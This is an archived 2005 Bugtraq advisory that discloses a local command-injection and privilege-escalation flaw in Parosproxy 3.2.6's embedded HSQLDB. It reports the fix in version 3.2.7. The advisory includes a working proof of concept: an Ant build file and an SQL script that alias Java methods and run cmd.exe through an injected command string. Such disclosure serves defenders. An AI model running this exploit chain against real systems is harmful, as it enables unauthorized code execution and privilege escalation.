lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <436B88F1.5010307@gmx.org>
Date: Fri, 04 Nov 2005 17:14:41 +0100
From: Marc Schoenefeld <marc.schoenefeld@....org>
To: "Bugtraq" <bugtraq@...urityfocus.com>
Subject: Parosproxy 3.2.6: Local Exploitation, Command injection vulnerability


Hello,

first word to say: Parosproxy is a great tool, it has helped
me a lot during pentesting. Unfortunately the JDK until version
1.4.2_08 is vulnerable in a way that allows to use JDBC as an attack path.
Parosproxy uses JDBC to persist some state data.

Concerning the release 3.2.6 of Parosproxy [www.parosproxy.org], there is a
minor problem when running it with JDK 1.4.2 until subrelease 08.
It can be used to trigger command injection in the embedded HSQLDB via the
JDBC (localhost on port 9001) by another (like unprivileged user with
lesser rights than the paros process) user on the machine. This
results in privilege escalation.

Demonstration files (see below) have been provided to 
contact@...osproxy.org.
A similar problem with HSQLDB has occured a while ago when exploiting 
former
version of JBoss [http://www.illegalaccess.org/java/jboss.php], you
will find further details there.

According to parosproxy.org this problem has been solved with Paros
version 3.2.7. Please update your old 3.2.6 or older version, it's good
and it's free !

Sincerely
Marc Schönefeld


=======build.xml==========
<project name="sql" default="exec">
<target name="exec">
<sql
    driver="org.hsqldb.jdbcDriver"
    url="jdbc:hsqldb:hsql://localhost:9001"
    userid="sa"
    password=""
    print="true">
    <fileset dir=".">
    <include name="*.sql"/>
    </fileset>
    <classpath>
        <pathelement location="lib.jar"/>
        </classpath>
    </sql>
    </target>
    </project>
=======build.xml==========

=======exec.sql==========
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug" ;
CALL COMPDEBUG(true);
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CALL  SETPROP ('org.apache.xml.utils.synthetic.javac','cmd.exe') ;
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile" ;
CALL  COMPILE('a','/c "cmd.exe /c notepad.exe
c:\windows\system32\drivers\etc\hosts >" ') ;
CREATE ALIAS GETPROP FOR "java.lang.System.getProperty";
CALL GETPROP('org.apache.xml.utils.synthetic.javac') ;
=======exec.sql==========




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ